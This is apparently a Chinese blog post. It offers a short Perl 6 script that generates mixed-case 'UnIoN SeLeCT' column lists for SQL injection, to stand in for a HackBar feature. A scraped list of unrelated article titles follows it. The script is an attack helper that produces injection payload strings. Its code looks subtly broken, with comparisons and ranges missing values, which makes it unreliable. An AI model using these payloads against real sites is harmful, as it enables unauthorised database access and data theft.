新版 firefox 中的 hackbar 没有 order by 字段填写, 所以就有了这个:

=begin pod
sql注入中自动输出order by 的位数
=end pod sub MAIN(Int $number,Str $char?) {
my @sql = [];
if @*ARGS.elems == {
for ..$number {
if $char ~~ /:i null/ {
@sql.push: $char;
}
else {
@sql.push: "'"~$char~"'" ;
}
}
say 'UnIoN SeLeCT '~@sql.join(',');
exit;
}
my $sql = (..$number).join(',');
say 'UnIoN sElEcT '~$sql;
}

最新文章

  1. Amoeba For MySQL读写分离
  2. 使用coverage工具统计python单元测试覆盖率
  3. 转:webRTC的前世今生
  4. Install Oracle Java JDK/JRE 7u55 on Fedora 20/19, CentOS/RHEL 6.5/5.10
  5. CKEditor配置及使用
  6. Mysql 存储程序
  7. samba和squid 安装
  8. GDI+ 填充背景时,非常多时候不起作用,GDI、GDI+配合运用
  9. scrapy学习总结
  10. angularjs中使用 <input type="file">标签实现一次最多上传5张图片
  11. Flutter之List
  12. 漂亮数组 Beautiful Array
  13. 7.12 其他面向对象设计原则3: 依赖倒置原则DIP
  14. vs2017离线安装且安装包不占用C盘空间
  15. cdnbest站点里设置防盗链
  16. XE5开发Android程序调用电话相关功能(短信息和电话) [转]
  17. 解决 shopnc b2b2c 版权问题 修改路经ULR及目录文件夹思路及教程
  18. [leetcode]692. Top K Frequent Words K个最常见单词
  19. java+hibernate+mysql
  20. FromBottomToTop第十一周项目博客

热门文章

  1. 《Linux内核分析》第一周学习笔记
  2. java实验报告一
  3. # linux读书笔记(3章)
  4. 通俗易懂的word2Vec负采样理解
  5. 团队作业之旅游行业APP分析
  6. Android map转json格式,附上Jackson包下载地址,导入过程
  7. Android Handler 异步调用修改界面与主线程
  8. Java反射的用法
  9. Luogu5162 WD与积木(生成函数+多项式求逆)
  10. 【BZOJ1967】[AHOI2005]穿越磁场(最短路)